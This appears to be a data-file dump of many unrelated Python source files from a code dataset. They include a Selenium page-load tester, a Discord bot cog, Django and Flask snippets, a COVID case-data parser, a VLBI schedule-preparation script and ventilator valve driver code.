content stringlengths 5 1.05M |
|---|
notas = (100, 50, 20, 10, 5, 2, 1)
valor = int(input("Digite o valor: "))
for i in range(len(notas)):
numDeNotas = valor / notas[i]
valor %= notas[i]
print("Quantidade de notas %d: %d" % (notas[i], numDeNotas))
|
#!/usr/bin/python
from . import * |
#!/usr/bin/env python
from __future__ import unicode_literals
from selenium.webdriver.common.by import By
from selenium.webdriver.support.wait import WebDriverWait
from selenium.webdriver.support import expected_conditions as EC
from selenium import webdriver
import threading
import random
import time
import json
# Developed with Python 2.7.6, PhantomJS 1.9.8
# Tested on OS X and Linux
def find_element_and_fill(browser, selector, value, field_value):
# Find element by selector (name or id) and value, and send field_value string to element
if selector == "name":
WebDriverWait(browser, TIMEOUT).until(EC.presence_of_element_located((By.NAME, value)))
browser.find_element_by_name(value).send_keys(field_value)
elif selector == "id":
WebDriverWait(browser, TIMEOUT).until(EC.presence_of_element_located((By.ID, value)))
browser.find_element_by_id(value).send_keys(field_value)
else:
raise "Invalid Selector type for %s" %value
def find_element_and_click(browser, selector, value):
# Find element by selector (name or id) and value, and click
if selector == "name":
WebDriverWait(browser, TIMEOUT).until(EC.presence_of_element_located((By.NAME, value)))
browser.find_element_by_name(value).click()
elif selector == "id":
WebDriverWait(browser, TIMEOUT).until(EC.presence_of_element_located((By.ID, value)))
browser.find_element_by_id(value).click()
else:
raise "Invalid Selector type for login buttom %s" %value
# Browser Actions
def authenticate(instance):
print("Browser %s : Authenticating as %s..." %((instance+1), authentication['username']['field_value']))
login_page = "%s://%s/%s" %(url_details['protocol'], url_details['url'], authentication['browser_authentication']['endpoint'])
browser_instances[instance].get(login_page)
if authentication['username']['enabled']:
find_element_and_fill(browser_instances[instance],
authentication['username']['dom_element_type'],
authentication['username']['dom_value'],
authentication['username']['field_value'])
if authentication['password']['enabled']:
find_element_and_fill(browser_instances[instance],
authentication['password']['dom_element_type'],
authentication['password']['dom_value'],
authentication['password']['field_value'])
find_element_and_click( browser_instances[instance],
authentication['submit_button']['dom_element_type'],
authentication['submit_button']['dom_value'])
def go_to_page(instance, page):
print("Browser %s : Navigating to %s..." %(instance+1, page))
browser_instances[instance].get(page)
def teardown(instance):
print("Browser %s : Quitting browser..." %(instance+1))
browser_instances[instance].quit()
def worker(instance):
# The Worker Thread for each webdriver instance
# Begin by loggin into site if enabled
if authentication['browser_authentication']['enabled']:
authenticate(instance)
time.sleep(AUTH_SLEEP_INTERVAL)
# Visit each page
for endpoint in url_details['endpoints']:
full_url = "%s://%s/" %(url_details['protocol'], url_details['url'])
go_to_page(instance, "%s%s" %(full_url, endpoint))
time.sleep(PAGE_SLEEP_INTERVAL)
# Clean up browsers after test
teardown(instance)
# Program Logic
if __name__ == '__main__':
# How long to wait for an element to appear before throwing a TimeoutException
TIMEOUT = 5
# How long to sleep before requesting the next page (to wait for all AJAX elements to load)
# Alternatively, you can add a WebDriverWait until certain elements are present, but this is hard to generalize
PAGE_SLEEP_INTERVAL = 1
# How long to wait after authenticating (to wait for all AJAX elements to load)
AUTH_SLEEP_INTERVAL = 2
# Import configured totals for each browser type
with open('config/browser_totals.json', 'r') as tally_of_browsers:
browsers = json.load(tally_of_browsers)
# Import list of endpoints as well as protocol and base url
with open('config/url_list.json', 'r') as list_of_urls:
url_details = json.load(list_of_urls)
# Import authentication details (for sites that require login)
with open('config/authentication.json', 'r') as login_params:
authentication = json.load(login_params)
# Intialize empty array to hold browser instances
browser_instances = []
# Spawn browser_count browsers
for browser_type in browsers:
for x in range(0, browsers[browser_type]):
if browser_type == 'headless':
# PhantomJS Capabilities for custom timeout length
capabilities = webdriver.DesiredCapabilities.PHANTOMJS
capabilities["phantomjs.page.settings.resourceTimeout"] = 1000
# Arguments to disable all SSL errors for unverified HTTPS connections
service_args = ['--ignore-ssl-errors=true', '--web-security=false']
browser_instances.append(webdriver.PhantomJS(desired_capabilities=capabilities, service_args=service_args))
browser_instances[-1:][0].implicitly_wait(3)
elif browser_type == 'firefox':
browser_instances.append(webdriver.Firefox())
elif browser_type == 'chrome':
browser_instances.append(webdriver.Chrome())
# Print test parameters
print("\nRunning with a total of %s browsers:" %str(len(browser_instances)))
for browser in browsers:
print('\t%s instances of %s browser' %(browsers[browser], browser))
print '\n'
# Spawn one worker thread for each function
# Chrome/PhantomJS/Firefox browsers should be separate subprocesses, so there is likely
# To be no great advantage for swapping the threading and multiprocessing libraries
threads = []
i = 0
for browser in browser_instances:
t = threading.Thread(target=worker, args=(i,))
threads.append(t)
t.start()
i += 1
# Wait for all threads to complete
for t in threads:
t.join()
print("\nAll tests complete\n")
|
# Copyright 2013-2020 Lawrence Livermore National Security, LLC and other
# Spack Project Developers. See the top-level COPYRIGHT file for details.
#
# SPDX-License-Identifier: (Apache-2.0 OR MIT)
class Fftw(Package):
"""Used to test that a few problematic concretization
cases with the old concretizer have been solved by the
new ones.
"""
homepage = "http://www.example.com"
url = "http://www.example.com/fftw-1.0.tar.gz"
version(2.0, 'foobar')
version(1.0, 'foobar')
variant('mpi', default=False, description='Enable MPI')
depends_on('mpi', when='+mpi')
|
import asyncio
import discord
from discord.ext import commands
class AutoRoles(commands.Cog):
def __init__(self, bot):
self.bot = bot
self.db = self.bot.get_cog("Database")
self.stop_loops = False
self.bot.loop.create_task(self.premium_sweep())
def cog_unload(self):
self.stop_loops = True
async def premium_sweep(self):
while True:
for member in self.bot.get_guild(self.bot.support_guild_id).members:
if await self.db.is_premium(member.id):
try:
await member.add_roles(
self.bot.get_guild(self.bot.support_guild_id).get_role(732635033738674186))
except discord.HTTPException:
pass
else:
try:
await member.remove_roles(
self.bot.get_guild(self.bot.support_guild_id).get_role(732635033738674186))
except discord.HTTPException:
pass
for i in range(0, 60 * 10, 1):
await asyncio.sleep(1)
if self.stop_loops:
return
def setup(bot):
bot.add_cog(AutoRoles(bot))
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
from struct import unpack
from .uuid import Uuid
class ValueState:
def __init__(self, payload):
"""
typedef struct {
PUUID uuid; // 128-Bit uuid
double dVal; // 64-Bit Float (little endian) value
} PACKED EvData;
"""
self.uuid = Uuid(payload[0:16])
if len(payload) == 24:
self.value = unpack('<d', payload[-8:])
def getUuid(self):
return self.uuid.get()
def getValue(self):
return self.value[0] |
import math
import matplotlib.pyplot as plt
import numpy as np
plt.ion()
plt.show()
def run():
V = 7.4
kV = np.array([[3600, 2850, 2170, 1800]])
Pmax = np.array([[240, 180, 125, 95]])
Ipmax = np.array([[62, 50, 35, 28]])
R0 = np.array([[0.0183, 0.0289, 0.0488, 0.0747]])
I0 = np.array([[2.8, 2.4, 1.6, 1.3]])
vmax = kV * V / 60 # * 2 * math.pi # rad/s
v = np.linspace(0, vmax[0,0])[:,np.newaxis]
Pin = I0 * V + (V / R0 - I0 * V) * (1 - v / vmax)
T = Pmax / (kV * (V / 2) / 60 * math.pi * 2) * (1 - v / vmax)
Pout = T * v
eta = Pout / Pin
max_T = np.amax(T)
max_p = np.amax(Pout)
clr = ['b', 'g', 'r', 'c']
for i in range(kV.shape[1]):
msk = np.squeeze(v < vmax[0,i])
plt.plot(v[msk], Pout[msk,i] / max_p, clr[i] + '--')
plt.plot(v[msk], T[msk,i] / max_T, clr[i] + ':')
plt.plot(v[msk], eta[msk,i], clr[i] + '-')
plt.ylim([0, 1])
plt.ylabel('Rel.: \\eta (-), Torque (:), Pout (--)')
plt.xlabel('Speed (rps)')
plt.title('Performance curves for Hobbywing Quicrun motors')
if __name__ == '__main__':
run()
input() |
DOMAIN_ICONS = {
"youtube.com": "fa:fab fa-youtube",
"youtu.be": "fa:fab fa-youtube",
"reddit.com": "fa:fab fa-reddit-alien",
"github.com": "fa:fab fa-github",
}
|
#!/usr/bin/env python3
"""
Merges several csv files (the first file serves as base)
Assumes that they have the same set of columns,
but the columns do not have to be in the same order
"""
import csv
import sys
def main():
if len(sys.argv) < 3:
print("Wrong number of arguments: specify at least two files to merge!")
exit(1)
# get header
with open(sys.argv[1], "r") as merge_to:
header = csv.DictReader(merge_to).fieldnames
# copy
with open(sys.argv[1], "a") as merge_to:
writer = csv.DictWriter(merge_to, fieldnames=header)
for i in range(2, len(sys.argv)):
with open(sys.argv[i], "r") as merge_from:
reader = csv.DictReader(merge_from)
for row in reader:
# print(row)
writer.writerow(row)
if __name__ == '__main__':
main()
|
from django.db.models import ManyToOneRel, Model
FIELD_PERMISSION_TYPES = ["view", "change"]
class FieldPermissionsModelRegistry(object):
def __init__(self):
self._registry = {}
def register(self, cls, include_fields=None, exclude_fields=None):
if not issubclass(cls, Model):
raise TypeError("cls should be a Model")
if include_fields is None:
include_fields = "__all__"
if exclude_fields is None:
exclude_fields = []
self._registry[cls] = {
"include_fields": include_fields,
"exclude_fields": exclude_fields,
}
def in_registry(self, klass):
model_name = klass._meta.model_name
return model_name in [klass._meta.model_name for klass in self._registry.keys()]
def get_include_fields_for(self, klass):
model_name = klass._meta.model_name
for klass, conf in self._registry.items():
if klass._meta.model_name == model_name:
return conf["include_fields"]
return []
def get_exclude_fields_for(self, klass):
model_name = klass._meta.model_name
for klass, conf in self._registry.items():
if klass._meta.model_name == model_name:
return conf["exclude_fields"]
return []
def get_models(self):
return self._registry.keys()
def get_model_fields(self, klass):
opts = klass._meta
include_fields = self.get_include_fields_for(klass)
exclude_fields = self.get_exclude_fields_for(klass)
fields = []
for field in opts.get_fields(include_parents=True):
if include_fields != "__all__" and field.name not in include_fields:
continue
if field.name in exclude_fields:
continue
fields.append(field)
return fields
def get_field_permissions_for_model(self, klass):
opts = klass._meta
include_fields = self.get_include_fields_for(klass)
exclude_fields = self.get_exclude_fields_for(klass)
perms = []
for field in opts.get_fields(include_parents=True):
if include_fields != "__all__" and field.name not in include_fields:
continue
if field.name in exclude_fields:
continue
for permission_type in FIELD_PERMISSION_TYPES:
field_name = field.name
verbose_field_name = field.name
if hasattr(field, "verbose_name"):
verbose_field_name = field.verbose_name
elif isinstance(field, ManyToOneRel):
if field.related_name:
verbose_field_name = (
field.related_model._meta.verbose_name_plural
)
else:
# If related_name is not set, add permission for the default [field name]_set field
field_name = field_name + "_set"
verbose_field_name = field_name + " set"
perms.append(
(
"{}_{}_{}".format(permission_type, opts.model_name, field_name),
"Can {} field {} in {}".format(
permission_type,
verbose_field_name.lower(),
opts.verbose_name,
),
)
)
return perms
field_permissions = FieldPermissionsModelRegistry()
|
# -*- coding: utf-8 -*-
from django import forms
class DocumentForm(forms.Form):
docfile = forms.FileField(
label='Select a file'
)
|
import json
import random
from os import environ
def lambda_handler(event, context):
request = event['Records'][0]['cf']['request']
redirect_url = ${redirect_path == null ? "request['uri']": "${redirect_path}"}
protocol = request['headers']['cloudfront-forwarded-proto'][0]['value']
response = {
'status': '${redirect_code}',
'statusDescription': '${redirect_description}',
'headers': {
'location': [{
'key': 'Location',
'value': protocol + '://${redirect_domain}' + redirect_url
}]
}
}
return response
|
#!/usr/bin/env python
import sys, os
import datetime
# Get path of script
scriptpath = os.path.dirname(os.path.realpath(__file__))
# take schedule name as input, e.g. b21096
exp = sys.argv[1]
# Check if we should download schedule, or assume it already exists locally
dl=False
if (len(sys.argv)==3) and (sys.argv[2]=="dl"):
dl=True
check = raw_input("Ready to fetch, drudg, and modify (SNP/PRC) experiment " + exp + ". NOTE: this will overwrite any existing files with this experiment name. Type go and hit enter to continue: " )
if check.strip() == "go":
if dl:
# Get schedule via wget, saving it in /usr2/sched/, e.g. /usr2/sched/vt9248.skd
print("INFO: Downloading sked file...")
wgetcmd = "fesh -f " + exp
os.system(wgetcmd)
print("INFO: ...done.")
# get hostname of this FS machine, fulla or freja
host = os.uname()[1]
# Translate hostname to telescope 2 letter code for drudg
tels = {"fulla":"oe", "freja":"ow"}
tel = tels[host]
# TODO: Could also read location.ctl if setup properly
# drudg sked file for SNP.
print("INFO: host is " + host + " so running drudg for telescope " + tel + " ...")
drudgcmd = "drudg /usr2/sched/" + exp + ".skd " + tel + " 3 0"
os.system(drudgcmd)
print("INFO: ...done.")
# change setupsx to setupbb in SNP file
print("INFO: Changing setupsx to setupbb and commenting in snp file...")
sedcmd = "sed -i 's/setupsx/\"setupbb/g' /usr2/sched/"+exp+tel+".snp"
os.system(sedcmd)
print("INFO: Commenting out setupxx in snp file...")
sedcmd = "sed -i 's/setupxx/\"setupxx/g' /usr2/sched/"+exp+tel+".snp"
os.system(sedcmd)
#print("INFO: ... and comment out disk_pos and ready_disk and checkmk5...")
#sedcmd = "sed -i 's/^disk_pos/\"disk_pos/g' /usr2/sched/"+exp+tel+".snp"
#os.system(sedcmd)
#sedcmd = "sed -i 's/^ready_disk/\"ready_disk/g' /usr2/sched/"+exp+tel+".snp"
#os.system(sedcmd)
#sedcmd = "sed -i 's/^checkmk5/\"checkmk5/g' /usr2/sched/"+exp+tel+".snp"
#os.system(sedcmd)
print("INFO: ...done.")
# copy template PRC file to /usr2/proc/expST.prc where ST is oe or ow
print("INFO: Instead of drudging for PRC, copy template PRC...")
cpcmd = "cp " + scriptpath + "/VGOS_default_prc." + tel + " /usr2/proc/" + exp + tel + ".prc"
os.system(cpcmd)
snpf = "/usr2/sched/"+exp+tel+".snp"
# Store lines in array
lines = []
for line in open(snpf):
lines.append(line)
# Find first timetag
for line in lines:
if line.startswith("!20"):
starttime = datetime.datetime.strptime(line.strip()[1:], "%Y.%j.%H:%M:%S")
break
preptime = (starttime+datetime.timedelta(minutes=-10)).strftime("%Y.%j.%H:%M:%S")
#print("starttime=", starttime, "preptime=", preptime)
wf = open(snpf, "w")
for line in lines:
wf.write(line)
if "Rack=DBBC" in line:
#wf.write("mk5=datastream=clear\n")
#wf.write("mk5=datastream=add:{thread}:*\n")
wf.write("prepant\n")
wf.write("!"+preptime + "\n")
wf.close()
print("All done.")
else:
print("Did not get go as answer so not doing anything.")
|
# Crear un archivo
f = open("flag.txt", "w")
f.write("quiero salir de fiesta pero estoy haciendo programación :) ")
f.close
f = open("flag.txt", "r")
print(f.read())
|
# -*- coding: utf-8 -*-
import pydicom
import pytest
from pynetdicom2 import asceprovider
from pydicom import uid
from pynetdicom2 import dsutils
from tiny_pacs import ae
from tiny_pacs import db
from tiny_pacs import event_bus
from tiny_pacs import storage
@pytest.fixture
def memory_storage():
bus = event_bus.EventBus()
_db = db.Database(bus, {})
_storage = storage.InMemoryStorage(bus, {})
bus.broadcast(event_bus.DefaultChannels.ON_START)
return _storage
def test_new_file(memory_storage: storage.InMemoryStorage):
memory_storage.new_file(
'1.2.3.4',
'1.2.3',
'1.2.3.5',
'test'
)
_file = storage.StorageFiles.get(storage.StorageFiles.sop_instance_uid == '1.2.3.4')
assert _file.sop_instance_uid == '1.2.3.4'
assert _file.sop_class_uid == '1.2.3'
assert _file.transfer_syntax == '1.2.3.5'
assert _file.file_name == 'test'
assert _file.is_stored == False
def test_successful_storage(memory_storage: storage.InMemoryStorage):
memory_storage.new_file(
'1.2.3.4',
'1.2.3',
'1.2.3.5',
'test'
)
ds = pydicom.Dataset()
ds.SOPInstanceUID = '1.2.3.4'
memory_storage.bus.broadcast(storage.StorageChannels.ON_STORE_DONE, ds)
_file = storage.StorageFiles.get(storage.StorageFiles.sop_instance_uid == '1.2.3.4')
assert _file.is_stored == True
def test_failure_storage(memory_storage: storage.InMemoryStorage):
memory_storage.new_file(
'1.2.3.4',
'1.2.3',
'1.2.3.5',
'test'
)
ds = pydicom.Dataset()
ds.SOPInstanceUID = '1.2.3.4'
memory_storage.bus.broadcast(storage.StorageChannels.ON_STORE_FAILURE, ds)
with pytest.raises(storage.StorageFiles.DoesNotExist): # pylint: disable=no-member
storage.StorageFiles.get(storage.StorageFiles.sop_instance_uid == '1.2.3.4')
def test_get_files(memory_storage: storage.InMemoryStorage):
ts = uid.ImplicitVRLittleEndian
ctx = asceprovider.PContextDef(1, '1.2.3', ts)
cmd_ds = pydicom.Dataset()
cmd_ds.AffectedSOPClassUID = '1.2.3'
cmd_ds.AffectedSOPInstanceUID = '1.2.3.4'
fp, start = memory_storage.bus.send_one(ae.AEChannels.ON_GET_FILE, ctx, cmd_ds)
ds = pydicom.Dataset()
ds.SOPInstanceUID = '1.2.3.4'
ds.SOPClassUID = '1.2.3'
ds_stream = dsutils.encode(ds, ts.is_implicit_VR, ts.is_little_endian)
fp.write(ds_stream)
fp.seek(start)
memory_storage.bus.broadcast(storage.StorageChannels.ON_STORE_DONE, ds)
for sop_class_uid, _ts, ds in memory_storage.on_store_get_files(['1.2.3.4']):
assert sop_class_uid == '1.2.3'
assert _ts == ts
assert ds.SOPInstanceUID == '1.2.3.4'
def test_get_files_empty(memory_storage: storage.InMemoryStorage):
memory_storage.new_file(
'1.2.3.4',
'1.2.3',
'1.2.3.5',
'test'
)
results = memory_storage.on_store_get_files(['1.2.3.4'])
assert not len(list(results))
|
from abc import ABC, abstractmethod
from deluca.lung.devices.pins import Pin, PWMOutput
import os
import numpy as np
class SolenoidBase(ABC):
"""An abstract baseclass that defines methods using valve terminology.
Also allows configuring both normally _open and normally closed valves (called the "form" of the valve).
"""
_FORMS = {"Normally Closed": 0, "Normally Open": 1}
def __init__(self, form="Normally Closed"):
"""
Args:
form (str): The form of the solenoid; can be either `Normally Open` or `Normally Closed`
"""
self.form = form
@property
def form(self) -> str:
""" Returns the human-readable form of the valve."""
return dict(map(reversed, self._FORMS.items()))[self._form]
@form.setter
def form(self, form):
"""Performs validation on requested form and then sets it.
Args:
form (str): The form of the solenoid; can be either `Normally Open` or `Normally Closed`
"""
if form not in self._FORMS.keys():
raise ValueError("form must be one of {}".format(self._FORMS.keys()))
else:
self._form = self._FORMS[form]
@abstractmethod
def open(self):
""" Energizes valve if Normally Closed. De-energizes if Normally Open."""
@abstractmethod
def close(self):
""" De-energizes valve if Normally Closed. Energizes if Normally Open."""
@property
@abstractmethod
def is_open(self) -> bool:
""" Returns True if valve is open, False if it is closed"""
class OnOffValve(SolenoidBase, Pin):
"""An extension of vent.io.iobase.Pin which uses valve terminology for its methods.
Also allows configuring both normally _open and normally closed valves (called the "form" of the valve).
"""
_FORMS = {"Normally Closed": 0, "Normally Open": 1}
def __init__(self, pin, form="Normally Closed", gpio=None):
"""
Args:
pin (int): The number of the pin to use
form (str): The form of the solenoid; can be either `Normally Open` or `Normally Closed`
gpio (PigpioConnection): pigpiod connection to use; if not specified, a new one is established
"""
self.form = form
Pin.__init__(self, pin, gpio)
SolenoidBase.__init__(self, form=form)
def open(self):
""" Energizes valve if Normally Closed. De-energizes if Normally Open."""
if self._form:
self.write(0)
else:
self.write(1)
def close(self):
""" De-energizes valve if Normally Closed. Energizes if Normally Open."""
if self.form == "Normally Closed":
self.write(0)
else:
self.write(1)
@property
def is_open(self) -> bool:
""" Implements parent's abstractmethod; returns True if valve is open, False if it is closed"""
energized = True if self.read() else False
if self.form == "Normally Closed":
return energized
else:
return not energized
class PWMControlValve(SolenoidBase, PWMOutput):
"""An extension of PWMOutput which incorporates linear
compensation of the valve's response.
"""
def __init__(self, pin, form="Normally Closed", frequency=None, response=None, gpio=None):
"""
Args:
pin (int): The number of the pin to use
form (str): The form of the solenoid; can be either `Normally Open` or `Normally Closed`
frequency (float): The PWM frequency to use.
response (str): "/path/to/response/curve/file"
gpio (PigpioConnection): pigpiod connection to use; if not specified, a new one is established
"""
PWMOutput.__init__(self, pin=pin, initial_duty=0, frequency=frequency, gpio=gpio)
SolenoidBase.__init__(self, form=form)
"""if response is None:
raise NotImplementedError('You need to implement a default response behavior')"""
if form != "Normally Closed":
raise NotImplementedError("Normally Open PWM control valves have not been implemented")
self._rising = True
self._load_valve_response(response_path=response)
@property
def is_open(self) -> bool:
""" Implements parent's abstractmethod; returns True if valve is open, False if it is closed"""
if self.setpoint > 0:
return True
else:
return False
def open(self):
""" Implements parent's abstractmethod; fully opens the valve"""
self.setpoint = 1.0
def close(self):
""" Implements parent's abstractmethod; fully closes the valve"""
self.setpoint = 0.0
@property
def setpoint(self) -> float:
"""The linearized setpoint corresponding to the current duty cycle according to the valve's response curve
Returns:
float: A number between 0 and 1 representing the current flow as a proportion of maximum
"""
return self.inverse_response(self.duty, self._rising)
@setpoint.setter
def setpoint(self, setpoint):
"""Overridden to determine & write the duty cycle corresponding
to the requested linearized setpoint according to the valve's
response curve
Args:
setpoint (float): A number between 0 and 100 representing how much to open the valve
"""
if not 0 <= setpoint <= 100:
raise ValueError("setpoint must be between 0 and 100 for an expiratory control valve")
self._rising = setpoint > self.setpoint
self.duty = self.response(setpoint, self._rising)
def response(self, setpoint, rising=True):
"""Setpoint takes a value in the range (0,100) so as not to confuse with duty cycle, which takes a value in the
range (0,1). Response curves are specific to individual valves and are to be implemented by subclasses.
Different curves are calibrated to 'rising = True' (valves opening) or'rising = False' (valves closing), as
different characteristic flow behavior can be observed.
Args:
setpoint (float): A number between 0 and 1 representing how much to open the valve
rising (bool): Whether or not the requested setpoint is higher than the last (rising = True), or the
opposite (Rising = False)
Returns:
float: The PWM duty cycle corresponding to the requested setpoint
"""
idx = (np.abs(self._response_array[:, 0] - setpoint)).argmin()
if rising:
duty = self._response_array[idx, 1]
else:
duty = self._response_array[idx, 2]
return duty
def inverse_response(self, duty_cycle, rising=True):
"""Inverse of response. Given a duty cycle in the range (0,1), returns the corresponding linear setpoint in the
range (0,100).
Args:
duty_cycle: The PWM duty cycle
rising (bool): Whether or not the requested setpoint is higher than the last (rising = True), or the
opposite (Rising = False)
Returns:
float: The setpoint of the valve corresponding to `duty_cycle`
"""
if rising:
idx = (np.abs(self._response_array[:, 1] - duty_cycle)).argmin()
else:
idx = (np.abs(self._response_array[:, 2] - duty_cycle)).argmin()
return self._response_array[idx, 0]
def _load_valve_response(self, response_path):
"""Loads and applies a response curve of the form `f(setpoint) = duty`. A response curve maps the underlying
PWM duty cycle `duty` onto the normalized variable `setpoint` representing the flow through the valve as a
percentage of its maximum.
Flow through a proportional valve may be nonlinear with respect to [PWM] duty cycle, if the valve itself does
not include its own electronics to linearize response wrt/ input. Absent on-board compensation of response, a
proportional solenoid with likely not respond [flow] at all below some minimum threshold duty cycle.
Above this threshold, the proportional valve begins to open and its response resembles a sigmoid: just past the
threshold there is a region where flow increases exponentially wrt/ duty cycle, this is followed by a region of
pseudo-linear response that begins to taper off, eventually approaching the valve's maximum flow asymptotically
as the duty cycle approaches 100% and the valve opens fully.
Args:
response_path: 'path/to/binary/response/file' - if response_path is None, defaults to `setpoint = duty`
"""
if response_path is not None:
response_path = os.path.join(
os.path.abspath(os.path.dirname(__file__)), "../../../", response_path
)
response_array = np.load(response_path)
else:
response_array = np.linspace([0, 0, 0], [100, 1, 1], num=101)
self._response_array = response_array
|
# Program to lowercase first n characters in a string
temp=str(input("Enter a string in upper case :"))
n=int(input("How many first characters do you want to in lower case:"))
new_string=temp[:n].lower()+temp[n:]
print(new_string)
|
# Generated by Django 3.1.4 on 2021-01-24 20:44
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('finance', '0014_auto_20210121_0152'),
]
operations = [
migrations.AddField(
model_name='transaction',
name='entry_amount',
field=models.DecimalField(decimal_places=2, default=0, max_digits=22, verbose_name='monto introduccido'),
),
migrations.AlterField(
model_name='transaction',
name='amount',
field=models.DecimalField(decimal_places=4, editable=False, max_digits=24, verbose_name='monto'),
),
]
|
import json
import os
import sys
from datetime import datetime
# Layer code, like parsing_lib, is added to the path by AWS.
# To test locally (e.g. via pytest), we have to modify sys.path.
# pylint: disable=import-error
try:
import parsing_lib
except ImportError:
sys.path.append(
os.path.join(
os.path.dirname(os.path.dirname(os.path.abspath(__file__))),
'common/python'))
import parsing_lib
def convert_date(raw_date):
"""
Convert raw date field into a value interpretable by the dataserver.
The date is listed in YYYY-mm-dd HH:MM:SS format, but the date filtering API
expects mm/dd/YYYYZ format.
"""
date = datetime.strptime(raw_date, "%Y-%m-%d %H:%M:%S")
# Some cases are reported using the Buddhist calendar which is 543 years ahead of the Gregorian
year = date.year
if year > 2540:
corrected_year = year - 543
return date.strftime(f"%m/%d/{corrected_year}Z")
else:
return date.strftime("%m/%d/%YZ")
def convert_gender(raw_gender):
if raw_gender == "Male" or raw_gender == "ชาย":
return "Male"
if raw_gender == "Female" or raw_gender == "หญิง":
return "Female"
raise ValueError(f'Unknown gender: {raw_gender}')
def convert_location(entry):
query_terms = [
# District doesn't have English translations.
entry['District'],
# Province sometimes has English translations or not or 'Unknown'
(entry['ProvinceEn']
if entry['ProvinceEn'] != 'Unknown' else '') or entry['Province'],
'Thailand',
]
return {"query": ", ".join([term for term in query_terms if term])}
def notes(entry):
if entry['StatQuarantine'] == 1:
return 'Case was in quarantine'
else:
return 'Case was not in quarantine'
def demographics(entry):
demo = {}
age = entry['Age']
if age:
demo["ageRange"] = {
"start": float(age),
"end": float(age),
}
gender = entry['GenderEn'] or entry['Gender']
if gender:
demo['gender'] = convert_gender(gender)
return demo or None
def parse_cases(raw_data_file, source_id, source_url):
"""Parses G.h-format case data from raw API data."""
with open(raw_data_file, "r") as f:
for entry in json.load(f)['Data']:
yield {
"caseReference": {
"sourceId": source_id,
"sourceEntryId": entry["No"],
"sourceUrl": source_url
},
"location": convert_location(entry),
"events": [
{
"name": "confirmed",
"dateRange":
{
"start": convert_date(entry["ConfirmDate"]),
"end": convert_date(entry["ConfirmDate"]),
}
}
],
"demographics": demographics(entry),
"notes": notes(entry),
}
def lambda_handler(event, context):
return parsing_lib.run_lambda(event, context, parse_cases)
|
import itertools
from stevedore import extension
Recipe = str
Dish = str
def get_inventory():
return {}
def get_all_recipes() -> list[Recipe]:
mgr = extension.ExtensionManager(
namespace='ultimate_kitchen_assistant.recipe_maker',
invoke_on_load=True,
)
def get_recipes(extension):
return extension.obj.get_recipes()
return list(itertools.chain.from_iterable(mgr.map(get_recipes)))
from stevedore import driver
def make_dish(recipe: Recipe, module_name: str) -> Dish:
mgr = driver.DriverManager(
namespace='ultimate_kitchen_assistant.recipe_maker',
name=module_name,
invoke_on_load=True,
)
return mgr.driver.prepare_dish(get_inventory(), recipe)
assert get_all_recipes() == ["Linguine", "Spaghetti", "Taco"]
assert make_dish("Linguine", "pasta_maker") == "Prepared Linguine"
|
#Autor: Olavo M
from flask import Flask, render_template, request, redirect
#import somente do necessario para a interface web
app = Flask(__name__)
class Noh: #clase do no, contendo seu valor e o ponteiro para o proximo
def __init__(self, valor):
self.valor = valor #o valor pode ser de qualquer tipo, mas tratei como string (nos inputs e demais funcoes)
self.proximo = None
class ListaEncadeada: #classe da lista encadeada simples
def __init__(self): #eh iniciada sem valor
self.prim=None
self.qtdNoh=0
def insere(self, valor):
if self.qtdNoh==0: #caso seja o primeiro valor, eh definido como prim
self.prim=Noh(valor)
self.qtdNoh+=1
else: #acrescenta os demais valores, percorrendo a lista ate o final
nohAtual = self.prim
while nohAtual.proximo != None:
nohAtual = nohAtual.proximo
nohAtual.proximo = Noh(valor)
self.qtdNoh+=1
def imprime(self): #retorna uma string com os valores da lista, para depois serem impressos
cursor = self.prim
resultado = ""
while cursor != None:
resultado += (str(cursor.valor)+" ")
cursor = cursor.proximo
return resultado
def inverte(self): #inverte em O(n) com tres ponteiros auxiliares
P_Anterior = None
P_Atual = self.prim
P_Prox = self.prim.proximo
while P_Prox != None: #percorre a lista ate o ultimo elemento
P_Atual.proximo = P_Anterior #inverte o ponteiro proximo, um por um
P_Anterior = P_Atual
P_Atual = P_Prox
P_Prox = P_Prox.proximo
P_Atual.proximo = P_Anterior #finaliza a operacao no ultimo elemento
self.prim = P_Atual #define o novo primeiro elemento
return P_Atual #retorna a noh da cabeca da lista resultante para cumprir com o enunciado, entretanto o valor do retorno devido a linguagem utilizada e o codigo escrito nao sera utilizado
Lista = ListaEncadeada()
@app.route("/", methods=['POST', 'GET'])
def index():
if request.method == "POST": #adiciona o valor na lista, passado por parametro pelo form
var = request.form["valor"]
Lista.insere(var)
print(Lista.imprime())
return redirect("/")
else:
if request.args.get("inverter"): #se o botao inverter for acionado, o metodo eh chamado
Lista.inverte()
texto = Lista.imprime()
return render_template("index.html", elementos=texto)
if __name__ == "__main__":
app.run() |
import logging
import os
import time
import pytest
import sdk_cmd
import sdk_plan
import sdk_tasks
import sdk_upgrade
import sdk_utils
from tests import config
log = logging.getLogger(__name__)
FRAMEWORK_NAME = "secrets/hello-world"
NUM_HELLO = 2
NUM_WORLD = 3
# check environment first...
if "FRAMEWORK_NAME" in os.environ:
FRAMEWORK_NAME = os.environ["FRAMEWORK_NAME"]
if "NUM_HELLO" in os.environ:
NUM_HELLO = int(os.environ["NUM_HELLO"])
if "NUM_WORLD" in os.environ:
NUM_WORLD = int(os.environ["NUM_WORLD"])
def get_task_status(pod_status, task_name):
return [t for t in pod_status['tasks'] if t['name'] == task_name][0]
def get_task_info(pod_info, task_name):
return [t for t in pod_info if t['info']['name'] == task_name][0]['info']
@pytest.mark.soak_pod_pause
def test_pause_single_task():
# get current agent id:
task_info = sdk_cmd.svc_cli(
config.PACKAGE_NAME, config.SERVICE_NAME, 'pod info hello-0', json=True
)[0]['info']
old_agent = task_info['slaveId']['value']
old_cmd = task_info['command']['value']
# sanity check of pod status/plan status before we pause/resume:
pod_status = sdk_cmd.svc_cli(
config.PACKAGE_NAME, config.SERVICE_NAME, 'pod status hello-0 --json', json=True
)
assert len(pod_status['tasks']) == 2
server_task = get_task_status(pod_status, 'hello-0-server')
assert server_task['status'] == 'RUNNING'
phases = sdk_cmd.svc_cli(
config.PACKAGE_NAME, config.SERVICE_NAME, 'plan status deploy --json', json=True
)['phases']
phase = phases[0]
assert phase['name'] == 'hello-deploy'
assert phase['status'] == 'COMPLETE'
assert phase['steps'][0]['name'] == 'hello-0:[server]'
assert phase['steps'][0]['status'] == 'COMPLETE'
assert phase['steps'][1]['name'] == 'hello-0:[companion]'
assert phase['steps'][1]['status'] == 'COMPLETE'
